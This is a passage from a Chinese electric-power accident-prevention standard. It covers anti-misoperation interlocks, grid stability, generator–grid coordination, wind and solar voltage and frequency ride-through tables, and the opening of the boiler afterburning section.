路器或隔离开关时,应确保操作断路器或隔离开关位置正确,并以现场实际状态 为准。 3.1.5 敞开式隔离开关与其所配装的接地开关间应配有可靠的机械防误闭 锁。 3.1.6 电磁锁、遥控闭锁装置、微机闭锁、智能防误终端等防误闭锁装置, 电源应单独设置,并与继电保护及控制回路电源分开。防误闭锁系统主机应由不 间断电源供电。防误闭锁系统主机应单独配置。 3.1.7 成套高压开关柜、成套六氟化硫(SF6)组合电器(GIS/PASS/HGIS) 五防功能应齐全、性能良好。开关柜应装设具有自检功能的带电显示装置,并与 接地开关(或临时接地装置)及柜门实现强制闭锁,带电显示装置传感器应三相 分别设置。高压开关柜内手车开关拉出后,隔离带电部位的挡板应可靠闭锁。 3.1.8 新、扩建的发、变电工程或主设备经技术改造后,防误闭锁装置应与 主设备同时设计、同时安装、同时验收投运。 设计阶段应根据选用防误闭锁装置的类型,配置完善的闭锁程序和闭锁部 件;闭锁部件的装设应和主设备安装同时进行;验收阶段应有运行人员参与,验 证闭锁程序的正确,检查五防闭锁功能是否齐全完善、是否达到强制闭锁要求。 闭锁部件安装应牢固可靠,使用方便。 3.1.9 调度、集控、场站等各层级操作都应具备完善的防误闭锁功能,并确 保操作权的唯一性。 3.1.10 采用新技术实现“五防”闭锁功能时,具备条件的应实现实时在线强 制闭锁,以满足新型电力系统及智能(数字)电网发展的实际需要。有条件时应 优先选用综合智能防误系统。 3.1.11 防误闭锁系统或装置应具备应急硬件(解锁钥匙)快速解锁机制,在 34 授权管理下,可临时停用、停运防误闭锁装置。 3.1.12 采用微机防误闭锁系统的场区及变电站内应预设固定接地桩,临时接 地线的挂、拆状态应实时采集监控,并实施强制性闭锁。 3.2 防误操作管理措施 3.2.1 严格执行操作票、工作票制度,并使“两票”制度标准化,管理规范 化。在满足网络安全防护的前提下,两票管理系统宜与防误系统形成业务贯通。 3.2.2 严格执行操作指令。当操作中发生疑问时,应立即停止操作并向发令 人报告,并禁止单人滞留在操作现场,待发令人确认无误并再行许可后,方可进 行操作。不准擅自更改操作票,不准随意解除防误闭锁装置,禁止擅自使用解锁 工具(钥匙)或扩大解锁范围。 3.2.3 建立完善的解锁工具(钥匙)及解锁密码使用和管理制度。防误闭锁 装置不能随意退出运行,只有在应急处理事故时,才能停用停运防误闭锁装置, 此时应经本单位分管生产的行政副职或总工程师批准;确因防误闭锁装置本身故 障短时间退出防误闭锁装置,应经变电站站长、运维班班长、操作或运维队长、 发电厂当班值长批准,并实行双重监护后实施,应按程序尽快修复该防误闭锁装 置并投入运行。 防误闭锁装置因缺陷不能及时消除,防误功能暂时不能恢复时,执行审批手 续后,可以通过加挂机械锁作为临时措施,此时机械锁的钥匙也应纳入解锁工具 (钥匙)管理,禁止随意取用。 3.2.4 应制定和完善防误闭锁装置的运行规程及检修规程,加强防误闭锁装 置的运行、维护管理,确保防误闭锁装置正常运行。对已投产尚未装设防误闭锁 装置的发、变电设备,要制订切实可行的防范措施和整改计划,必须尽快装设防 误闭锁装置。 3.2.5 应配备充足的经国家认证认可的质检机构检测合格的安全工作器具和 安全防护用具。检修工作时,为防止误登室外带电设备,应在带电设备四周装设 全封闭检修临时围栏。 4 防止系统稳定破坏事故的重点要求 4.1 加强电源支撑能力 35 4.1.1 合理规划电源接入点,并满足分层分区原则。发电厂宜根据布局、装 机容量以及所起的作用,接入相应电压等级,并综合考虑地区受电需求、地区电 压及动态无功支撑需求、相关政策等影响。 4.1.2 电源均应具备一次调频、快速调压、调峰能力,且应满足相关标准要 求。新能源场站应根据电网需求,具备相应的惯量能力。在新能源并网发电比重 较高的地区,新能源场站应具备短路容量支撑能力。 4.1.3 综合考虑电力系统安全稳定水平、电力市场空间、可再生能源比例、 峰谷时段发用电平衡、系统总体调节能力等因素,统筹协调、合理布局抽水蓄能 电站、储能、单循环燃气机组等灵活性电源。 4.1.4 发电厂的升压站不应作为系统枢纽站,也不应装设构成电磁环网的联 络变压器。 4.1.5 开展风电场和集中式光伏电站接入系统设计之前,应完成“系统接纳风 电、光伏能力研究”和“大型风电场、光伏电站输电系统设计”等新能源相关研究。 风电场、光伏电站接入系统方案应与电网总体规划相协调,并满足相关规程、规 定的要求。 4.1.6 对于点对网或经串补送出等大电源远距离交直流外送系统有特殊要求 的情况,应开展励磁系统、调速系统对电网影响、直流孤岛、次同步振荡等专题 研究,研究结果用于指导励磁、调速系统的选型。 4.1.7 严格做好风电场、光伏电站并网验收环节的工作,严禁不符合标准要 求的设备并网运行。 4.1.8 并网电厂机组投入运行时,相关继电保护、安全自动装置等稳定措施、 一次调频、电力系统稳定器(PSS)、自动发电控制(AGC)、自动电压控制(AVC) 等自动调整措施和电力专用通信配套设施等应同时投入运行。 4.1.9 新能源场站应加强运行监视与数据分析工作的管理,优化运行方式, 制订防范机组大量脱网的技术及管理措施,保障系统安全稳定运行。 4.1.10 电源侧的继电保护(涉网保护、线路保护)和自动装置(自动励磁调 节器、电力系统稳定器、调速器、稳定控制装置、自动发电控制装置等)的配置 和整定应与发电设备相互配合,并应与电力系统相协调,保证其性能满足电力系 统稳定运行的要求。具体按照国家标准《电力系统网源协调技术导则》(GB/T 36 40594-2021)等相关标准执行。 4.2 加强系统网架结构 4.2.1 加强电网规划工作,制定完备的电网发展规划和实施计划,尽快消除 电网薄弱环节,重点加强主干网架建设及配电网完善工作,对供电可靠性要求高 的电网应适度提高设计标准,确保电网结构合理、运行灵活、坚强可靠和协调发 展。 4.2.2 电网规划应统筹考虑、合理布局,各电压等级电网协调发展。电网结 构应按照电压等级和供电范围分层分区,控制短路电流,各电压等级及交直流系 统之间应相互协调。 4.2.3 电网发展应适度超前,规划的输电通道及联络线输电能力应在满足运 行需求的基础上留有一定裕度。 4.2.4 直流系统应优化落点选址,完善近区网架,提高系统对直流的支撑能 力,直流输电的容量应与送受端系统的容量匹配,直流短路比、多馈入直流短路 比应达到合理水平。 4.2.5 受端系统应具有多个方向的多条受电通道,电源点应合理分散接入, 每个独立输电通道的输送电力占受端系统最大负荷的比重不宜过大,并保证失去 任一通道时不影响电网安全运行和受端系统可靠供电。 4.2.6 在直流容量占比较大的受端系统,应关注由于直流闭锁或受端系统大 容量电源脱网引起大功率缺额导致的电压稳定和频率稳定问题,并采取必要的控 制措施。 4.2.7 受端电网 330kV 及以上变电站设计时应考虑一台变压器停运后对地区 供电的影响,必要时一次投产两台或更多台变压器。 4.2.8 在工程设计、建设、调试和启动阶段,电网、发电、设计、建设、调 试等相关企业应相互协调配合,分别制定有效的组织、管理和技术措施,以保证 一次设备投入运行时,相关配套设施等能同时投入运行。 4.2.9 电网应进行合理分区,分区电网应尽可能简化,有效限制短路电流; 兼顾供电可靠性和经济性,分区之间要有备用联络线以满足一定程度的负荷互带 能力。 4.2.10 避免和消除严重影响系统安全稳定运行的电磁环网。在高一级电压网 37 络建设初期,对于暂不能消除的影响系统安全稳定运行的电磁环网,应采取必要 的稳定控制措施,同时应采取后备措施限制系统稳定破坏事故的影响范围。 4.2.11 联系较为薄弱的省级电网之间及区域电网之间宜采取自动解列等措 施,防止一侧系统发生稳定破坏事故时扩展到另一侧系统。特别重要的系统(政 治、经济或文化中心)应采取必要措施,防止相邻系统发生事故时直接影响到本 系统的安全稳定运行。 4.2.12 加强开关设备、保护装置的运行维护和检修管理,确保能够快速、可 靠地切除故障。 4.3 加强系统稳定分析及管理 4.3.1 重视和加强系统稳定计算分析工作。规划、设计、运行部门必须严格 按照《电力系统安全稳定计算规范》(GB/T 40581-2021)等相关规定要求进行 系统安全稳定计算分析,全面把握系统特性,优化电网规划设计方案,滚动调整 建设时序,完善电网安全稳定控制措施,提高系统安全稳定水平。 4.3.2 在系统规划、设计有关稳定计算中,系统中各设备模型均应与生产运 行相关稳定计算模型一致,以正确反映系统动态特性。 4.3.3 在规划、设计阶段,对尚未有具体参数的规划设备,宜采用同类型、 同容量设备的典型模型和参数。 4.3.4 对基建阶段的特殊运行方式,应进行认真细致的电网安全稳定分析, 制定相关的控制措施和事故预案。 4.3.5 严格执行相关规定,进行必要的计算分析,制定完善的基建投产启动 方案。必要时应开展电网相关适应性专题分析。 4.3.6 应做好电网运行控制极限管理,根据系统发展变化情况,及时计算和 调整电网运行控制极限。电网调度部门确定的电网运行控制极限值,应按照相关 规定在计算极限值的基础上留有一定的裕度。 4.3.7 加强计算模型、参数的研究和实测工作,并据此建立系统计算的各种 元件、控制装置及负荷的模型和参数。 4.3.8 严格执行电网各项运行控制要求,严禁超过运行控制极限运行。电网 一次设备故障后,应按照故障后方式电网运行控制的要求,尽快将相关设备的潮 流(或发电机出力、电压等)控制在规定值以内。 38 4.3.9 电网正常运行中,必须按照有关规定留有一定的旋转备用和事故备用 容量。 4.3.10 加强电网在线安全稳定分析与预警系统建设,提高电网运行决策时效 性和预警预控能力。 4.4 增强电力监控系统(二次系统)可靠性 4.4.1 做好电力监控系统(二次系统)规划。结合电网发展规划,做好继电 保护、安全自动装置、自动化系统、通信系统规划,提出合理配置方案,保证接 入电网的二次相关设施安全水平与电网要求保持一致。电力监控系统(二次系统) 网络安全水平应与国家和行业规定相一致。 4.4.2 稳定控制措施设计应与系统设计同时完成。合理设计稳定控制措施和 失步解列,高频高压切机、低频低压减载方案。 4.4.3 加强 110kV 及以上电压等级母线、220kV 及以上电压等级主设备快速 保护建设。 4.4.4 特高压直流及柔性直流的控制保护逻辑应根据不同工程及工程不同阶 段接入电网的安全稳定特性进行差异化设计。 4.4.5 一次设备投入运行时,相关继电保护、安全自动装置、稳定措施、自 动化系统、故障信息系统和电力专用通信配套设施等应同时投入运行。 4.4.6 加强安全稳定控制装置入网管理。对新入网或软、硬件更改后的安全 稳定控制装置,应经装置所接入电网调度机构组织专业部门检测合格后,进行出 厂测试(或验收试验)、现场联合调试和挂网试运行等工作。 4.4.7 严把工程投产验收关,专业技术人员必须全程参与基建和技改工程验 收工作。 4.4.8 调度机构应根据电网的变化情况及时地分析、调整各种保护装置、安 全自动装置的配置或整定值,并按照有关规程规定每年下达低频低压减载方案, 及时跟踪负荷变化,细致分析低频减载实测容量,定期核查、统计、分析各种安 全自动装置的运行情况。各运行维护单位应加强检修管理和运行维护工作,防止 电网事故情况下装置出现拒动、误动。 4.4.9 加强继电保护运行维护,正常运行时,严禁 220kV 及以上电压等级线 路、变压器等设备无快速保护运行。 39 4.4.10 母差保护临时退出时,应尽量缩短无母差保护运行时间,并严格限制 母线及相关元件的倒闸操作。 4.4.11 受端系统枢纽厂站继电保护定值整定困难时,应侧重防止保护拒动。 4.5 防止系统无功电压稳定破坏 4.5.1 电力系统中无功电源的安排应有规划,并留有适当裕度,以保证系统 各中枢点的电压在正常和事故后均能满足规定的要求。 4.5.2 电力系统中的无功补偿应能保证系统在高峰和低谷运行方式下,分(电 压)层和分(供电)区的无功平衡,并应避免经长距离线路或多级变压器传送无 功功率。 4.5.3 无功补偿设备的配置与选型,应进行技术经济比较,并应具有灵活的 无功电力调节能力及足够的事故和检修备用容量。 4.5.4 为保证受端系统发生突然失去一回线路、失去直流单级或失去一台大 容量机组(包括发电机失磁)等故障时,保持电压稳定和正常供电,不致出现电 压崩溃,受端系统中应有足够的动态无功补偿设备。对于大容量直流落点近区、 新能源集中外送系统以及高比例受电地区,通过技术经济比较可选择调相机、 STATCOM 等。 4.5.5 新能源场站应具备无功功率调节能力和自动电压控制功能,并保持其 运行的稳定性。新能源场站无功功率调节能力原则上应与同步发电机保持一致。 4.5.6 110kV 及以上电压等级发电厂(包括新能源场站)、变电站均应具备 自动电压控制(AVC)功能,可对发电机组、有载调压变压器分接头、并联电容 器、并联电抗器、调相机、SVC、SVG 等设备进行自动控制。 4.5.7 变电站一次设备投入运行时,配套的无功补偿设备及自动投切装置等 应同步投入运行。 4.5.8 在基建阶段应完成自动电压控制系统(AVC)的联调和传动工作。自 动电压控制系统(AVC)应先投入半闭环控制模式运行 48 小时,自动控制策略 验证无误后再改为闭环控制模式。 4.5.9 电网局部电压超出允许偏差范围时,应根据分层分区、就地平衡的原 则,调整该局部地区内无功电源的出力。若电压偏差仍不符合要求时,可调整相 应的有载调压变压器分接头。当母线电压低于调度部门下达的电压曲线下限时, 40 应闭锁接于该母线有载调压变压器分接头的调整。 4.5.10 发电厂、变电站电压监测系统和调度自动化系统应保证有关测量数据 的准确性。中枢点电压超出电压合格范围时,应及时向运行人员告警。 4.5.11 在电网运行时,当系统电压持续降低并有进一步恶化的趋势时,必须 及时采取拉路限电等果断措施,防止发生系统电压崩溃事故。 4.6 加强大面积停电恢复能力 4.6.1 根据电网结构特点合理划出分区,各分区应至少安排1~2台具备黑启 动能力的机组,并保证机组容量、所处位置分布合理。 4.6.2 结合本系统的实际情况制定大面积停电后系统恢复方案(包括黑启动 方案),以满足在保证系统设备安全的前提下快速有序地实现系统和用户供电的 恢复。上述方案应根据系统运行方式的变化适时进行修订或调整,并落实到电网 及各并网主体。 4.6.3 发生电力系统大面积停电后应首先确定停电的地区、范围和负荷状况, 然后依次确定本区内电源或外部系统帮助恢复供电的可能性。当不可能时,应尽 快执行系统恢复方案。 4.6.4 在恢复启动过程中系统电压和频率的波动可比正常运行方式允许范围 有所增加,但不能超出设备能够承受的范围,应避免出现非同期合闸。 5 防止机网协调及风电机组、光伏逆变器大面积脱网事故的 重点要求 5.1 防止机网协调事故 5.1.1 各发电企业(厂)应重视和完善与电网运行关系密切的励磁、调速、 无功补偿装置和保护选型、配置,其涉网控制性能除了保证主设备安全,还必须 满足电网安全运行的要求。 5.1.2 发电机励磁调节器(包括电力系统稳定器(PSS))须经涉网性能检 测合格,形成入网励磁调节器软件版本,才能进入电网运行。 5.1.3 40MW 及以上水轮机调速器控制程序须经全面的静态模型测试和动态 涉网性能测试合格,形成入网调速器软件版本,才能进入电网运行。 5.1.4 根据电网安全稳定运行的需要,100MW 及以上容量的火力发电机组、 41 核电机组和燃气发电机组、40MW 及以上容量的水轮发电机组和光热机组,或接 入 220kV 电压等级及以上的同步发电机组应配置 PSS。 5.1.5 发电机应具备进相运行能力。100MW 及以上容量的火力发电机组、核 电机组和燃气发电机组、40MW 及以上容量的水轮发电机组和光热机组,或接入 220kV 电压等级及以上的同步发电机组,有功额定工况下功率因数应能达到 −0.95~−0.97,必要时可结合机组接入电网情况,由当地电力调度机构、试验单 位以及电厂通过专题研究确定。励磁系统的低励限制定值应可在线调整。 5.1.6 新投产的大型汽轮发电机应具有一定的耐受带励磁失步振荡的能力。 发电机失步保护应考虑既要防止发电机损坏又要减小失步对系统和用户造成的 危害。为防止失步故障扩大为电网事故,应当为发电机解列设置一定的时间延迟, 使电网和发电机具有重新恢复同步的可能性。 5.1.7 为防止频率异常时发生电网崩溃事故,发电机组应具有必要的频率异 常运行能力。正常运行情况下,汽轮发电机组频率异常允许运行时间应满足表 5-1 的要求。水轮发电机频率异常运行能力应优于汽轮发电机并满足当地电网运 行控制要求。 表 5-1 汽轮发电机组频率异常允许运行时间 频率范围 允许运行时间 (Hz) 累计(min) 每次(sec) 51.0 以上~51.5 >30 >30 50.5 以上~51.0 >180 >180 48.5~50.5 连续运行 48.5 以下~48.0 >300 >300 48.0 以下~47.5 >60 >60 47.5 以下~47.0 >10 >20 47.0 以下~46.5 >2 >5 5.1.8 发电机励磁系统应具备一定过负荷能力。 5.1.8.1 励磁系统应保证发电机励磁电流不超过其额定值的 1.1 倍时能够连 续运行。 5.1.8.2 发电机交流励磁机励磁系统顶值电压倍数不低于 2 倍,自并励静止 励磁系统顶值电压倍数在发电机 80%额定电压时,汽轮发电机不应低于 1.8 倍, 水轮发电机不应低于 2 倍。强励电流倍数等于 2 倍时,允许持续强励时间不低于 10s。 42 5.1.9 发电厂应准确掌握接入大规模新能源汇集地区电网、有串联补偿电容 器送出线路以及接入直流换流站近区的汽轮发电机组可能存在的次/超同步振荡 风险情况,并做好抑制和预防机组次/超同步振荡措施,同时应装设次/超同步振 荡监测及保护装置,协助电网管理部门共同防止次/超同步振荡。 5.1.10 机组并网调试前三个月,发电厂应向相应电力调度机构提供电网计算 分析所需的主设备(发电机、变压器等)参数、二次设备(电流互感器(TA)、 电压互感器(TV))参数及保护装置技术资料以及励磁系统(包括 PSS)、调 速系统技术资料(包括原理及传递函数框图)等。 5.1.11 新建机组及增容改造机组,发电厂应根据有关电力调度机构要求,开 展励磁系统、调速系统建模及参数实测试验、电力系统稳定器参数整定试验、发 电机进相试验、一次调频试验、自动发电控制(AGC)试验、自动电压控制(AVC) 试验工作,实测建模报告需通过电力调度机构认可的单位审核,并将试验报告报 有关电力调度机构。 5.1.12 并网电厂应根据《并网电源涉网保护技术要求》(GB/T 40586-2021) 的规定、电网运行情况和主设备技术条件,认真校核涉网保护与电网保护的整定 配合关系,并根据电力调度机构的要求,做好每年度对所辖设备的整定值进行全 面复算和校核工作。当电网结构、线路参数和短路电流水平发生变化时,应及时 校核相关涉网保护的配置与整定,避免保护发生不正确动作行为。 5.1.13 发电机励磁系统正常应投入自动方式运行,PSS 正常必须置入投运状 态,励磁系统(包括 PSS)的整定参数应适应跨区交流互联电网不同联网方式运 行要求,对 0.1~2.0Hz 系统振荡频率范围的低频振荡模式应能提供正阻尼。 5.1.14 利用自动电压控制系统(AVC)对发电机调压时,受控机组励磁系统 应置于自动方式。 5.1.15 100MW 及以上火电、燃气及核电机组,40MW 及以上水电机组,接 入 220kV 及以上电压等级的同步发电机组的频率异常保护,过电压保护,过激 磁保护,失磁保护,失步保护,转子过负荷保护,定子过负荷保护,超速保护, 一类辅机保护,功率负荷不平衡保护,零功率切机保护等涉网保护,发电机励磁 系统(包括 PSS)等设备(保护)定值必须报有关电力调度机构备案。 5.1.15.1 励磁系统的过励限制(即过励磁电流反时限限制和强励电流瞬时限 43 制)环节的特性应与发电机转子的过负荷能力相一致,并与发电机保护中转子过 负荷保护定值相配合,在保护跳闸之前动作。 5.1.15.2 励磁变压器保护定值应与励磁系统强励能力相配合,防止机组强励 时保护误动作。 5.1.15.3 励磁系统如设有定子电流限制环节,则定子电流限制环节的特性应 与发电机定子的过电流能力相一致,并与发电机保护中定子过负荷保护定值相配 合,在保护跳闸之前动作。 5.1.15.4 励磁系统的伏/赫兹限制(V/Hz 限制)环节特性应与发电机或变压 器过激磁能力低者相匹配,应在发电机组对应继电保护装置跳闸动作前进行限 制。V/Hz 限制环节在发电机空载和负载工况下都应正确工作。 5.1.15.5 励磁系统如设有定子过压限制环节,应与发电机过压保护定值相配 合,在保护跳闸之前动作。 5.1.16 电网低频减载装置的配置和整定,应保证系统频率动态特性的低频持 续时间符合相关规定,并有一定裕度。发电机组低频保护定值可按汽轮发电机制 造厂有关规定进行整定,低频保护应与电网低频减载装置配合,低频保护定值应 低于电网低频减载装置最低一级定值。汽轮机超速保护控制(OPC)应与机组过 频保护、电网高频切机装置协调配合,遵循高频切机先于 OPC,OPC 先于过频 保护动作的原则,电网有特殊要求者除外。应考虑 OPC 动作特性与电网特性的 配合,防止 OPC 反复动作对电网的扰动。机组低电压保护定值应低于系统(或 所在地区)低压减载的最低一级定值。 5.1.17 发电机组一次调频运行管理 5.1.17.1 并网发电机组的一次调频功能参数应按照电网运行的要求进行整 定,一次调频功能应按照电网有关规定投入运行。一次调频功能应与 AGC 功能 协调配合,且优先级高于 AGC 功能。 5.1.17.2 新投产机组和在役机组大修、通流改造、灵活性改造、原动机及其 调节控制系统改造(升级)、控制逻辑和参数变更、运行方式改变后,发电厂应 向相应电力调度机构交付由技术监督部门或有资质的试验单位完成的一次调频 性能试验和调速系统参数测试及建模试验报告,以确保机组一次调频功能长期安 全、稳定运行。在役机组应定期进行一次调频性能复核试验和调速系统参数测试 44 及建模复核试验,复核周期不应超过 5 年。 5.1.17.3 发电机组调速系统中的调门特性参数应与一次调频功能和 AGC 调 度方式相匹配。在阀门大修后或发现两者不匹配时,应进行调门特性参数测试及 优化整定,确保机组参与电网调峰调频的安全性。 5.1.17.4 具有孤网或孤岛运行可能的机组,机组调节系统应针对孤岛、孤网 运行方式配备专门的一次调频功能,其性能指标应根据电网稳定需求确定。 5.1.18 发电机组进相运行管理 5.1.18.1 发电厂应根据发电机进相试验结果绘制指导实际进相运行的 P-Q 图,编制相应的进相运行规程,并根据电力调度机构的要求进相运行。发电机应 能监视双向无功功率和功率因数。 5.1.18.2 并网发电机组的低励限制辅助环节功能参数应按照电网运行的要 求进行整定和试验,与电压控制主环合理配合,确保在低励限制动作后发电机组 稳定运行。 5.1.18.3 低励限制定值应参考进相试验结果、考虑发电机电压影响并与发电 机失磁保护相配合,应在发电机失磁保护之前动作。应结合机组 B 级及以上检 修定期检查限制动作定值。 5.1.19 发电机组自动发电控制(AGC)运行管理 5.1.19.1 单机容量 100MW 及以上火电(不含背压式热电机组)和燃气机组, 40MW 及以上非灯泡贯流式水电机组和抽水蓄能机组,根据所在电网要求,都应 参加电网 AGC 运行。 5.1.19.2 发电机组 AGC 的性能指标应满足接入电网的相关规定和要求。 5.1.19.3 发电机组大修、增容改造、通流改造、脱硫脱硝改造、高背压改造、 原动机及其调节控制系统改造(升级)、控制逻辑和参数变更、运行方式改变后, 发电厂应向相应电力调度机构交付由技术监督部门或有资质的试验单位完成的 AGC 试验报告,以确保机组 AGC 功能长期安全、稳定运行。 5.1.20 发电厂应制订完备的发电机带励磁失步振荡故障的应急措施,并按有 关规定做好保护定值整定,包括: 5.1.20.1 当失步振荡中心在发变组内部,失步运行时间超过整定值或电流振 荡次数超过规定值时,保护动作于解列。 45 5.1.20.2 当失步振荡中心在发变组外部时,发电机组应允许失步运行 5~20 个振荡周期。此时,应立即增加发电机励磁,同时减少有功负荷,切换厂用电, 延迟一定时间,争取恢复同步。 5.1.20.3 水轮发电机承受失步振荡运行能力应满足当地电网运行控制要求。 5.1.21 发电机失磁异步运行管理 5.1.21.1 严格控制发电机组失磁异步运行的时间和运行条件。根据国家有关 标准规定,不考虑对电网的影响时,汽轮发电机应具有一定的失磁异步运行能力, 但只能维持发电机失磁后短时运行,此时必须快速降负荷。若在规定的短时运行 时间内不能恢复励磁,则机组应与系统解列。水轮发电机不允许失磁异步运行, 失磁保护宜带时限动作于解列。 5.1.21.2 发电机失磁保护阻抗圆元件宜按异步边界圆整定。 5.1.22 为避免系统扰动引起全厂机组同时跳闸,同一电厂内各发电机的失 磁、失步保护在跳闸策略上应协调配合。 5.1.23 电网发生事故引起发电厂高压母线电压、频率等异常时,电厂一类辅 机保护不应先于主机保护动作,以免切除辅机造成发电机组停运。 5.1.24 发电机组附属设备变频器应具备在电网发生故障的瞬态过程中保持 运行的能力。电厂应按照标准要求开展厂用一类辅机变频器高/低电压穿越能力 的评估,必要时进行改造,并将评估、改造结果报有关电力调度机构。 5.1.25 新建及改扩建电厂应主动开展并网安全性评价工作,已投入运行的电 厂应定期进行并网安全性评价,保证发电机组满足并网安全条件、评价标准以及 电力监管机构和电力调度机构涉网安全规定的要求。 5.2 防止风电机组、光伏逆变器大面积脱网事故 5.2.1 新建及改扩建风电场、光伏发电站设备选型时,性能指标必须满足《电 力系统安全稳定导则》(GB 38755-2019)要求,并通过国家有关部门授权的有 资质的检测机构的并网检测,不符合要求的不予并网。 5.2.2 风电机组、光伏逆变器除具备低电压穿越能力外,机端电压原则上应 具有 1.3 倍额定电压持续 500ms 的高电压穿越能力。以电压耐受运行时间评价风 电机组和光伏逆变器的高电压穿越能力,满足表 5-2 要求。 46 表 5-2 风电机组和光伏逆变器高电压耐受运行时间表 并网点工频电压值(标幺值) 风电机组 光伏逆变器 UT≤1.10 连续运行 1.10 <UT≤1.2 具有每次运行 10s 的能力 具有每次运行 具有每次运行 1.2 <UT≤1.25 1s 的能力 500ms 的能力 1.25 <UT≤1.30 具有每次运行 500ms 的能力 UT >1.30 允许退出运行 5.2.3 风电场、光伏发电站并网点的电压偏差、频率偏差、闪变、谐波/间谐 波、三相电压不平衡等电能质量指标满足《风电场接入电力系统技术规定》 (GB/T 19963-2021)、《光伏发电站接入电力系统技术规定》(GB/T 19964-2012)要 求时,场站内的风电机组、光伏逆变器应能正常运行。 5.2.4 风电场、光伏发电站的无功容量应按照分层分区、基本平衡的原则进 行配置,场站在充分利用风电机组、光伏逆变器等无功容量的基础上,根据当地 电网要求配置动态无功补偿装置,且电压无功系统调节时间小于 100ms。 5.2.5 风电场、光伏发电站的动态无功补偿装置的低电压、高电压穿越能力 应不低于风电机组、光伏逆变器的穿越能力,支撑风电机组、光伏逆变器满足低 电压、高电压穿越要求。 5.2.6 风电场、光伏发电站的频率耐受能力应满足表 5-3 要求。 表 5-3 风电场和光伏发电站频率耐受能力表 频率范围(Hz) 风电机组(s) 光伏逆变器(s) 51.0<f≤51.5 >30 50.5<f≤51 >180 48.5≤f≤50.5 连续运行 48.0≤f<48.5 >1800 >300 47.5≤f<48.0 >60 47.0≤f<47.5 >20 46.5≤f<47.0 >5 5.2.7 风电场、光伏发电站应配置场站监控系统,实现风电机组、光伏逆变 器的有功/无功功率和无功补偿装置的在线动态调节,并具备接受电力调度机构 远程自动控制的功能。风电场、光伏发电站监控系统应按相关技术标准要求,采 集并向电力调度机构上传所需的运行信息。 5.2.8 风电场、光伏发电站一次调频功能应自动投入,技术指标满足《并网 电源一次调频技术规定及试验导则》(GB/T 40595-2021)和当地电网的要求。 47 当系统频率偏差超过一次调频死区值(风电场调频死区在±0.03Hz~±0.1Hz 范围 内,光伏发电站调频死区在±0.02Hz~±0.06Hz 范围内,具体根据电网需要确定), 风电场、光伏发电站应能调节有功输出,参与电网一次调频,在核定的出力范围 内响应系统频率变化。 5.2.9 风电场、光伏发电站应根据电网安全稳定需求配置相应的安全稳定控 制装置。 5.2.10 风电场、光伏发电站应向相应电力调度机构提供电网计算分析所需的 风电机组、光伏逆变器及其升压站内主要涉网设备参数、有功与无功控制系统技 术资料、并网检测报告等。风电场、光伏发电站应完成风电机组、光伏逆变器及 配套静止无功发生器(SVG)、静态无功补偿装置(SVC)的参数测试、一次调 频、AGC 投入、AVC 投入等试验,并向电力调度机构提供相关试验报告。 5.2.11 风电场、光伏发电站应根据电力调度机构电网稳定计算分析要求,开 展电磁暂态和机电暂态建模及参数实测工作,并将模型和试验报告报电力调度机 构。 5.2.12 电力系统发生故障,并网点电压出现跌落或骤升时,风电场、光伏发 电站应具备电压支撑能力,动态调整风电机组、光伏逆变器和场内无功补偿装置 的无功功率,确保电容器、电抗器支路在紧急情况下能被快速正确投切,配合系 统将并网点电压和机端电压快速恢复到正常范围内。 5.2.13 风电场、光伏发电站 35kV 电缆终端头、中间接头应严格按照安装图 纸规定的尺寸、工艺要求制作并经电气试验合格,电缆附件的安装应实行全过程 验收。投运后应定期检查电缆终端头及接头温度、放电痕迹和机械损伤等情况。 5.2.14 风电场、光伏发电站汇集线系统的单相故障应快速切除。汇集线系统 应采用经电阻或消弧线圈接地方式,宜采用低电阻接地方式,不应采用不接地或 经消弧柜接地方式。经电阻接地的汇集线系统发生单相接地故障时,应能通过相 应保护快速切除,同时应兼顾机组运行电压适应性要求。经消弧线圈接地的汇集 线系统发生单相接地故障时,应能可靠选线,快速切除。汇集线保护快速段定值 应对线路末端故障有灵敏度,汇集线系统中的母线应配置母差保护。 5.2.15 接入 220kV 及以上电压等级的风电场、光伏发电站的单元变压器高压 侧宜采用断路器隔离故障。单元变压器配有速动电气量保护并可作用于其高压侧 48 断路器时,汇集线系统过流 I 段或相间距离 I 段保护应增加短延时以保证选择性。 5.2.16 风电机组、光伏逆变器控制系统参数和变流器参数设置应与电压、频 率等保护协调一致。风电机组、光伏逆变器的电压、频率保护应与安全自动装置、 防孤岛装置的电压、频率等保护协调一致。 5.2.17 风电场、光伏发电站内保护定值应按照相关标准要求整定并经电站审 核,其涉网保护定值应与电网保护定值相配合,报电力调度机构备案。 5.2.18 风电机组、光伏逆变器因安全自动装置动作,电压、频率等电气保护 动作,导致脱网后不得自行并网,故障脱网的风电机组、光伏逆变器须经电力调 度机构许可后并网。 5.2.19 发生故障后,风电场、光伏发电站应及时向电力调度机构报告故障及 相关保护动作情况,及时收集、整理、保存相关资料,积极配合调查。 5.2.20 风电场、光伏发电站应在升压站内配置故障录波装置,启动判据应至 少包括电压越限和电压突变量,记录升压站内设备在故障前 10s 至故障后 60s 的 电气量数据,波形记录应满足相关技术标准。 5.2.21 风电场、光伏发电站应配备全站统一的卫星时钟(北斗和 GPS), 并具备双网络授时功能,对场站内各种系统和设备的时钟进行统一校正。 5.2.22 当风电机组、光伏逆变器各部件软件版本信息、涉网保护定值及关键 控制技术参数更改后,需提供故障穿越能力等涉网性能一致性技术分析及说明资 料。 5.2.23 风电场、光伏发电站应向电力调度机构定时上传可用发电功率的短 期、超短期预测,实时上传理论发电功率和场站可用发电功率,上传率和准确率 应满足电网电力电量平衡要求。 5.2.24 对于可能存在次同步振荡、超同步振荡风险的风电场、光伏发电站, 应在场站投运前开展次/超同步振荡风险研究,向电力调度机构提供研究结论和 相关技术资料,并根据评估研究结果采取抑制、保护和监测措施。 6 防止锅炉事故的重点要求 6.1 防止锅炉尾部再次燃烧事故 6.1.1 防止锅炉尾部再次燃烧事故重点是防止回转式空气预热器转子蓄热元 49 件、脱硝装置的催化元件、余热利用装置、除尘器及其干除灰系统、锅炉底部干 除渣系统等部位的再次燃烧事故。 6.1.2 锅炉机组的设计选型要保证回转式空气预热器本身及其辅助系统设计 合理、配套齐全,必须保证预热器在运行中和热态停机状态均有完善的监控和防 止再次燃烧事故的手段,包括: (1)预热器应设独立的主辅电机、盘车装置、火灾报警装置、入口烟气挡 板、出入口风挡板及相应的联锁保护。 (2)预热器应设可靠的停转报警装置,停转报警信号应取自预热器的主轴, 而不能取自预热器马达。 (3)预热器应有相配套的水冲洗系统,设备性能必须满足冲洗工艺要求, 电厂必须配套具体的水冲洗制度和水冲洗措施,并严格执行。 (4) 